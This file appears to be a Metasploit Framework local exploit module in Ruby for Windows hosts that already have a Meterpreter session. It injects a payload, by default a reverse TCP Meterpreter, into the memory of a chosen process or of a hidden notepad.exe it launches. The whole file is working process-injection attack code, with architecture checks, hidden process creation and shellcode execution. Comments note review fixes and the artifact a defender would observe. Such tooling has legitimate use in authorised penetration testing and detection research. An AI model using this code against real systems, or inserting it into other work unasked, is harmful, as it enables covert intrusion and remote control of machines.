metasploit-framework/modules/exploits/windows/local/payload_inject.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
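# Local module that runs the selected payload inside another process on a
# Windows host where a Meterpreter session already exists.
#
# Target selection: the PID datastore option is used when it names a running
# process; otherwise (or when NEWPROCESS is set) a notepad.exe is started and
# used as the target.
#
# Detection note: the fallback path starts notepad.exe with the 'Hidden' flag
# and then passes payload bytes to execute_shellcode (supplied by the included
# Msf::Post::Windows::Process mixin) for that PID, so a windowless notepad.exe
# that no interactive user started is the observable artifact of the default
# configuration.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Process

  # Registers module metadata and the PID / NEWPROCESS options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name'           => 'Windows Manage Memory Payload Injection',
      'Description'    => %q{
        This module will inject a payload into memory of a process. If a payload
        isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID
        datastore option isn't specified, then it'll inject into notepad.exe instead.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'sinn3r'
        ],
      'Platform'       => [ 'win' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [ [ 'Windows', {} ] ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => "Oct 12 2011"
    )
    super(module_info)

    register_options(
      [
        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
        OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
      ], self.class)
  end

  # Entry point for the run command: records the payload name and its
  # architecture list, resolves the target PID and hands it to inject_into_pid.
  # Returns early with an error when no PID could be obtained.
  def exploit
    @payload_name = datastore['PAYLOAD']
    @payload_arch = framework.payloads.create(@payload_name).arch

    # sysinfo is only available on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?

    pid = get_pid
    unless pid
      print_error("Unable to get a proper PID")
      return
    end

    inject_into_pid(pid)
  end

  # Decides which PID to use as the target.
  #
  # Falls back to a freshly started notepad.exe when PID is 0, when NEWPROCESS
  # is set, or when has_pid? does not find the PID.
  # NOTE(review): an unset PID option appears to reach has_pid? as nil, which
  # reports it as missing before the fallback runs; confirm against OptInt.
  #
  # @return [Integer, nil] the target PID, or nil when the fallback process
  #   could not be started
  def get_pid
    pid = datastore['PID']
    if pid == 0 || datastore['NEWPROCESS'] || !has_pid?(pid)
      print_status("Launching notepad.exe...")
      pid = create_temp_proc
    end
    pid
  end

  # Determines whether a PID is present in the session's process list.
  #
  # @param pid [Integer] PID to look for
  # @return [Boolean] false when the PID is absent or the list cannot be read
  def has_pid?(pid)
    begin
      running = client.sys.process.processes
    rescue Rex::Post::Meterpreter::RequestError
      print_error("Unable to enumerate processes")
      return false
    end

    return true if running.any? { |entry| entry['pid'] == pid }

    print_error("PID #{pid} does not actually exist.")
    false
  end

  # Checks that the payload architecture and the target process architecture
  # match, by comparing @payload_arch.first with the process entry's 'arch'.
  #
  # @param pid [Integer] PID of the target process
  # @return [Boolean] true when they match; false when they differ or when the
  #   PID is not in the process list
  def arch_check(pid)
    target = client.sys.process.processes.find { |entry| pid == entry["pid"] }

    # Fail closed: previously a PID missing from the list fell out of the loop
    # and returned the (truthy) process list, so the caller carried on without
    # any architecture having been verified.
    unless target
      print_error("PID #{pid} was not found in the process list; cannot verify its architecture.")
      return false
    end

    vprint_status("Process found checking Architecture")
    if @payload_arch.first == target['arch']
      vprint_good("Process is the same architecture as the payload")
      true
    else
      print_error("The PID #{ target['arch']} and Payload #{@payload_arch.first} architectures are different.")
      false
    end
  end

  # Starts a hidden notepad.exe whose architecture matches the payload.
  #
  # The directory under %windir% depends on the payload architecture and the
  # session architecture: System32 when they are equal, Sysnative for an x64
  # payload on an x86 session, SysWOW64 for an x86 payload on an x64 session.
  #
  # @return [Integer, nil] PID of the new process, or nil when the combination
  #   is not handled or the process could not be started
  def create_temp_proc()
    windir = client.sys.config.getenv('windir')

    system_dir =
      case [@payload_arch.first, client.arch]
      when [ARCH_X86, ARCH_X86], [ARCH_X64, ARCH_X64] then 'System32'
      when [ARCH_X64, ARCH_X86] then 'Sysnative'
      when [ARCH_X86, ARCH_X64] then 'SysWOW64'
      end

    # Previously an unhandled combination left the command nil and passed it
    # straight to execute; report it and let the caller handle the missing PID.
    unless system_dir
      print_error("Unsupported payload/session architecture combination")
      return nil
    end

    cmd = "#{windir}\\#{system_dir}\\notepad.exe"
    begin
      process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
    rescue Rex::Post::Meterpreter::RequestError
      return nil
    end

    process.pid
  end

  # Runs the architecture check and, when it passes, passes the encoded payload
  # to execute_shellcode for the given PID. A Meterpreter request error during
  # that step is reported rather than raised.
  #
  # @param pid [Integer] PID of the target process
  def inject_into_pid(pid)
    vprint_status("Performing Architecture Check")
    return unless arch_check(pid)

    begin
      print_status("Preparing '#{@payload_name}' for PID #{pid}")
      raw = payload.encoded
      execute_shellcode(raw, nil, pid)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to inject payload:")
      print_line(e.to_s)
    end
  end
end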